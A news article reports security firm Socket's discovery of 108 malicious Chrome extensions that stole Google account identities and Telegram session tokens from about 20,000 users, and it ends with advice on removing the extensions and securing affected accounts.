108 malicious Chrome extensions steal data from 20,000 users

MUMBAI: Chrome users just got a stark reminder that not every extension is an innocent add-on some are quietly picking your digital pockets. Security firm Socket has uncovered a large-scale coordinated cyberattack involving 108 malicious browser extensions on the Google Chrome Web Store. These extensions, which collectively racked up around 20,000 installs, disguised themselves as handy tools like Telegram sidebar clients, text translators, and even slot machine-style games, while secretly stealing sensitive user data and hijacking sessions.

All 108 extensions operated under five seemingly distinct publisher identities including names like Yana Project, Gamegen, and Rodeo Games but covertly shared a single command-and-control (C2) infrastructure. According to Socket security researcher Kush Pandya, they routed stolen credentials, user identities, browsing data, and more to servers controlled by the same operator.

Particularly alarming, 54 of the extensions specifically targeted Google account identities, harvesting email addresses and profile pictures through OAuth2 during sign-in attempts. Another 45 contained a universal backdoor that allowed attackers to silently open arbitrary URLs on users’ browsers at startup, based on remote instructions.

Advertisement

The most severe offender was the ‘Telegram Multi-account’ extension. It secretly extracted active Telegram Web authentication tokens and transmitted them to a remote server every 15 seconds. This gave attackers full control over victims’ accounts accessing messages, contacts, and linked services without needing passwords or two-factor authentication codes.

Five extensions went even further, using Chrome’s declarativeNetRequest API to strip security headers from websites (including Youtube and TikTok) before pages loaded, weakening built-in protections and enabling ad injection or harmful code execution.

The campaign highlights the growing risks of browser-based threats, where seemingly legitimate extensions serve as stealthy vectors for data theft and account takeover in an era of instant digital convenience.

Advertisement

How to stay safe Security experts recommend immediate action:

• Review and remove any suspicious installed extensions from Chrome settings.
• If you used Telegram-related extensions, log out of all active Telegram Web sessions via the ‘Devices’ section in the mobile app.
• If you signed in with Google credentials through any of these tools, treat the account as potentially compromised and revoke unfamiliar third-party access in your Google account settings.

In a world where extensions promise productivity or fun with just one click, this incident serves as a timely nudge: even the smallest add-ons can carry big risks. A quick spring clean of your browser could be the smartest security move you make today. Stay vigilant your data is only as safe as the tools you trust.